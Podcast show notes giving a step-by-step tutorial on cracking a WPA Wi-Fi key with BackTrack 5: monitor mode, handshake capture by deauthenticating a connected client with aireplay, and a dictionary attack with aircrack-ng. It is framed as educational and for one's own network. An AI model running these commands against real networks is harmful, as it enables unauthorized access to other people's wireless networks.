MHF How-Tos Episode 7 Show Notes

Disclaimer: The tutorial featured in this episode is purely for educational, white hat purposes only. You must not use this tutorial to gain unauthorized access to other wireless networks that you don’t have permission to use. You must only use this tutorial on your own wireless network. We cannot be held responsible if you are caught hacking by your local law enforcement agency.

In the last part of our tutorial, we told you how to burn backtrack 5 to a DVD. If you want to run it on a USB flash drive, then you can use unetbootin. In this show, we are doing the actual cracking. Before we get to the tutorial, you can also use Reaver(which comes with backtrack 5) to do this and we will have this tutorial posted on this site very soon so stay tuned.

This is where we should say that you will need a pen and paper or a copy of GEdit open. GEdit also comes with backtrack. First, go to applications in the top left-hand corner of the screen, then select accessories and click terminal.

step 1: To find the name and mac address of our wireless NIC, type in iwconfig. Mac addresses take the form of a 12 character string consisting of letters A through to F and 0 through to 9. Highlight your mac address and right-click and select copy. Go to your GEdit and hold down control(ctrl) and press the V key. In our case, the interface was called wlan1.

step 2: To put our wireless NIC into monitor mode, type in airmon-ng start wlan1. This created a new interface called mon0.

step 3: To find the access point we are trying to attack, type in airodump-ng followed by our monitoring interface(in our case, mon0). Copy and paste the mac address(BSSID or base station identifier) of the access point you want to attack into GEdit(you’ll need it later).

step 4: Now we have to capture the traffic going across our network. Type in the command: airodump-ng –channel(channel number) –bssid(BSSID) -w (name of your wireless network). Keep this running and open a new terminal by holding down control and shift kers whilst pressing the N key on your keyboard.

step 5: to capture the 4-way handshake, we need to have another computer which has already connected to the network via Wi-Fi. Type in aireplay -0 1 -a (BSSID) -c (target computer) mon0. Go back to the first terminal window and if you see the words “WPA handshake” followed by the BSSID, you can go ahead and stop this process. Hold down the control key and press the C key to stop this process. This is where you will need to either create a dictionary file or get one. You can also use crunch to create your wordlist. You need a second computer or tablet or smartphone here because we need to be able to force it to disconnect and capture that moment(so to speak).

step 6: now for the actual finding of the wireless key. Type in aircrack-ng -w(complete path of your dictionary file) -b (BSSID) (name of your packet capture file – e.g. linksys.cap). Wait for some time as it is going through the dictionary file to find out if your wireless key is in the dictionary file.

If you need to create one, then you can use crunch.

We are pleased to announce that we are going to be making the leap from audio to video podcast very soon. If you have an intro theme that you have made, then please submit your themes as an MP3 file to mhftechnet@gmail.com.

If you have a how to that you want us to do, or any questions, comments or feedback or anything that we have missed, then send us an email to howtos@mhftech.net.